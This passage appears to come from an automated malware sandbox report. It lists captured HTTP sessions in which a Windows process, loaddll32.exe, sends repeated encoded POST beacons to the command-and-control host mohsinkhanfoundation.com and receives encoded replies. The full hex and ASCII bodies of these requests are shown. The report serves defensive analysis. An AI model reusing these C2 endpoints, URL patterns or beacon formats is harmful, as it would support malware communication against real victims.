39 37 4c 6d 74 38 66 6d 73 70 66 47 77 71 65 57 6f 74 66 47 39 2b 65 47 74 35 65 47 74 79 4b 57 78 36 65 57 70 36 66 47 39 7a 4b 47 74 34 66 57 74 35 4b 47 78 2f 65 6d 6f 76 66 47 39 7a 4b 47 74 34 66 32 74 39 63 32 78 33 66 6d 6f 6f 66 47 39 38 66 6d 74 34 4c 6d 74 36 65 6d 77 72 65 32 70 2b 66 47 39 7a 4b 47 74 34 64 32 74 37 63 32 78 33 4b 57 70 2b 64 47 39 35 65 6d 74 38 66 6d 73 75 65 47 77 71 65 47 70 34 4c 32 39 2f 63 32 74 30 4c 57 74 35 66 32 78 33 4b 57 70 37 66 57 38 76 66 47 74 2f 66 6d 73 73 4c 57 78 38 65 6d 6f 6f 66 47 38 71 4b 57 73 76 66 6d 73 70 4c 57 78 2f 4c 32 70 37 66 57 38 6f 66 57 74 2f 64 32 73 76 65 32 78 34 66 6d 6f 74 65 47 39 37 65 57 74 37 4b 32 73 73 63 32 78 38 4b 57 70 38 4b 47 39 35 66 6d 74 37 65 6d 73 76 65 57 78 36 63 32 70 7a 4c 6d 39 2b 63 6d 74 2b 65 32 74 36 65 6d 77 72 65 47 70 39 65 6d 39 7a 4b 47 74 38 4c 47 74 2b 4b 57 78 33 4b 57 70 2b 64 47 39 36 4b 57 74 38 66 6d 73 75 65 47 78 33 4b 57 70 37 65 47 39 7a 4b 47 74 38 66 6d 73 75 65 32 78 33 63 6d 70 2f 65 47 39 35 66 6d 74 2b 65 32 74 2f 4b 57 78 36 4b 57 70 39 66 57 39 2b 63 32 74 35 4c 6d 74 2f 65 6d 77 70 4c 57 6f 75 66 47 39 2b 63 6d 74 35 4b 57 74 2f 4b 6d 78 33 4b 57 70 36 66 6d 38 75 4b 47 74 30 65 57 74 2f 4c 32 78 35 63 32 70 39 4b 57 39 39 66 32 74 37 65 32 74 36 65 32 78 35 63 32 70 38 65 32 39 39 63 32 74 36 4b 6d 74 38 63 6d 78 36 66 32 70 39 64 47 39 2f 4b 57 74 37 65 47 74 34 66 57 78 2f 66 47 6f 74 4b 6d 38 76 66 32 73 70 64 32 74 36 65 32 78 2f 65 32 70 37 66 47 39 37 65 6d 74 2f 66 6d 73 73 4c 57 78 36 66 47 70 2b 65 32 39 2b 66 57 74 35 65 47 74 2f 66 47 78 35 63 32 70 34 4c 57 39 2b 66 47 74 37 64 6d 73 72 66 47 77 70 4c 57 6f 76 65 57 38 75 63 32 73 74 65 32 74 36 65 32 78 2f 65 32 70 37 66 47 39 2b 4b 47 74 2f 66 6d 73 70 63 6d 78 36 65 6d 70 2b 66 57 39 39 4b 32 74 38 66 47 74 2f 65 6d 78 36 65 6d 70 39 64 47 39 79 65 6d 74 39 4b 57 74 36 65 32 78 2f 65 32 70 2b 66 32 39 2b 65 6d 74 36 64 32 74 2f 66 47 78 33 63 6d 70 79 4b 6d 38 6f 66 47 73 71 4b 57 73 75 66 6d 78 36 65 32 6f 75 64 57 39 7a 4b 57 74 38 66 32 74 36 65
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt/dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUctL28ucmt0dmt6e2x/e2p7fG99emt0dmsvfmx8emovfm99fmt0LWt/eWx8e2pzLm9+eGt8LGtyKWx6eWp6eG9zKGt7fWt4c2x/LWope29/K2t+eWt5emwpLWp4fW8oemstLGt5KGx5emp8L297eGt+LGt4e2wsemooKm97Lmt8fmspfGwqeWotfG9+eGt5eGtyKWx6eWp6fG9zKGt4fWt5KGx/emovfG9zKGt4f2t9c2x3fmoofG98fmt4Lmt6emwre2p+fG9zKGt4d2t7c2x3KWp+dG95emt8fmsueGwqeGp4L29/c2t0LWt5f2x3KWp7fW8vfGt/fmssLWx8emoofG8qKWsvfmspLWx/L2p7fW8ofWt/d2sve2x4fmoteG97eWt7K2ssc2x8KWp8KG95fmt7emsveWx6c2pzLm9+cmt+e2t6emwreGp9em9zKGt8LGt+KWx3KWp+dG96KWt8fmsueGx3KWp7eG9zKGt8fmsue2x3cmp/eG95fmt+e2t/KWx6KWp9fW9+c2t5Lmt/emwpLWoufG9+cmt5KWt/Kmx3KWp6fm8uKGt0eWt/L2x5c2p9KW99f2t7e2t6e2x5c2p8e299c2t6Kmt8cmx6f2p9dG9/KWt7eGt4fWx/fGotKm8vf2spd2t6e2x/e2p7fG97emt/fmssLWx6fGp+e29+fWt5eGt/fGx5c2p4LW9+fGt7dmsrfGwpLWoveW8uc2ste2t6e2x/e2p7fG9+KGt/fmspcmx6emp+fW99K2t8fGt/emx6emp9dG9yemt9KWt6e2x/e2p+f29+emt6d2t/fGx3cmpyKm8ofGsqKWsufmx6e2oudW9zKWt8f2t6e
                                          Sep 27, 2021 20:25:48.418734074 CEST1006INData Raw: 32 78 2f 65 32 70 2b 4c 6d 39 34 65 32 73 6f 66 57 74 2f 65 57 78 35 63 32 70 37 66 47 39 34 65 47 73 76 66 32 74 79 66 32 78 36 65 57 70 2b 66 6d 39 2b 65 47 74 35 66 47 74 2f 65 57 78 36 65 32 70 39 64 47 38 75 4b 47 74 35 65 6d 74 34 4c 6d 78
                                          Data Ascii: 2x/e2p+Lm94e2sofWt/eWx5c2p7fG94eGsvf2tyf2x6eWp+fm9+eGt5fGt/eWx6e2p9dG8uKGt5emt4Lmx8KWotKm8vf2t0dmspfWx3eGoof29+emt6d2tye2x8eGp7fG97emt0dmsve2x5Kmp7eG9+emt6Lmt7LWx6fWp9dG98f2t4eWtzLmx3fWotKm8vf2t5KWt5emwpLWp+e29+fWt6LmssLWx6eGp+em99cmt+K2t6fWx+
                                          Sep 27, 2021 20:25:48.418809891 CEST1008INData Raw: 38 66 57 78 35 66 6d 70 38 66 6d 39 39 66 32 74 37 66 57 74 35 4b 6d 78 39 65 32 70 39 64 47 39 38 66 6d 74 37 65 32 74 39 65 32 78 38 4b 6d 70 35 4b 6d 39 35 4c 47 74 36 66 47 74 38 4c 57 78 35 66 32 70 39 65 57 39 35 4c 32 74 36 4c 6d 74 39 65
                                          Data Ascii: 8fWx5fmp8fm99f2t7fWt5Kmx9e2p9dG98fmt7e2t9e2x8Kmp5Km95LGt6fGt8LWx5f2p9eW95L2t6Lmt9emx4fmp9eW98eGt7dmt4Lmx5eGp9Km99Lmt+KWt6L2x/Kmp/fW99eWt6fGt8fmx4e2p8eG95Lmt4emt8Lmx5eGp9Km99fmt6dmt8Lmx5fGp4LW95emt6eGt9Kmx5cmp8fG95KWt+f2t8f2x5fmp9em99KWt6fmt9f2


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          30192.168.2.749806107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:10.182096958 CEST1532OUTPOST /pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:10.603671074 CEST1540INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:10 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          31192.168.2.749810107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:10.890607119 CEST1550OUTPOST /pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:11.326118946 CEST1564INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:10 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          32192.168.2.749811107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:11.588450909 CEST1571OUTPOST /pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:12.021758080 CEST1573INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:11 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          33192.168.2.749813107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:12.289050102 CEST1581OUTPOST /pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:12.714524984 CEST1582INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:12 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          34192.168.2.749815107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:12.989154100 CEST1590OUTPOST /pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:13.383555889 CEST1592INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:13 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          35192.168.2.749817107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:13.650248051 CEST1593OUTPOST /pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:14.036498070 CEST1601INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:13 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          36192.168.2.749819107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:14.286284924 CEST1603OUTPOST /pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:14.689887047 CEST1611INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:14 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8eEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          37192.168.2.749821107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:14.941658974 CEST1612OUTPOST /pcQLeLMbur/H0N6dX1le310YXlkfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:15.382468939 CEST1620INHTTP/1.1 200 OK
